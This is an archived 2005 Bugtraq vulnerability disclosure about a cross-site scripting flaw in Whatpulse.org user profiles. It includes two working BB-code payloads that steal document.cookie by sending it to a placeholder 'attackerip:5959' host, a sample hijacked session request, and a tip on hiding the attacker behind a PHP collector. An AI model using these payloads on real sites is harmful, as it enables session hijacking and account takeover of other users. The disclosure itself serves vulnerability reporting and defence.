lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 6 Jul 2005 23:09:29 -0000
From: rift13@...rter.net
To: bugtraq@...urityfocus.com
Subject: Vulnerability in Whatpulse.Org profiles allows XSS and session
 hijacking


Whatpulse.org is a site that provides software to allower users to keep track of how many keystrokes they have entered and 'pulse' them to the website and view who has the most keys to date, etc.  Whatpulse has a profile feature that lets a user describe a little bit about themself to otherusers.  The vulnerability lies within the profile's allowance of unsanitized BB code.  Here is the example code:


[IMG=Javascript:document.write('><iframe src=http://attackerip:5959?' + document.cookie + '  height=1% width=1%></iframe>');][/IMG]

[IMG="asdf" onMouseMove="document.write('-<iframe src=http://attackerip:5959?' + document.cookie + ' scrolling=no hspace=0 vspace=0 height=1% frameborder=0 width=1%></iframe>')""" style="Z-INDEX: 100; LEFT: 0px; POSITION: absolute; TOP: 0px; height:2000px; width:8000px;"]asdf[/IMG]



there is a line break in the code.  the top image tag works for IE users, the second image tag works for mozilla users, the second one is triggered by moving the mouse over the webpage.  The above example will connect to the attacker's ip address on a listening port, in this case 5959 and request a page, in this case it will request a page named after their session cookie, giving the attacker their session id.  This of course can be modified to submit to a php application helping to cloak the attacker from identification.  When you submit the user cookie you submit it in the Get request, for example:

GET /?PHPSESSID=eec5a9da58ecd36422e53dc89194af15; HTTP/1.1

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ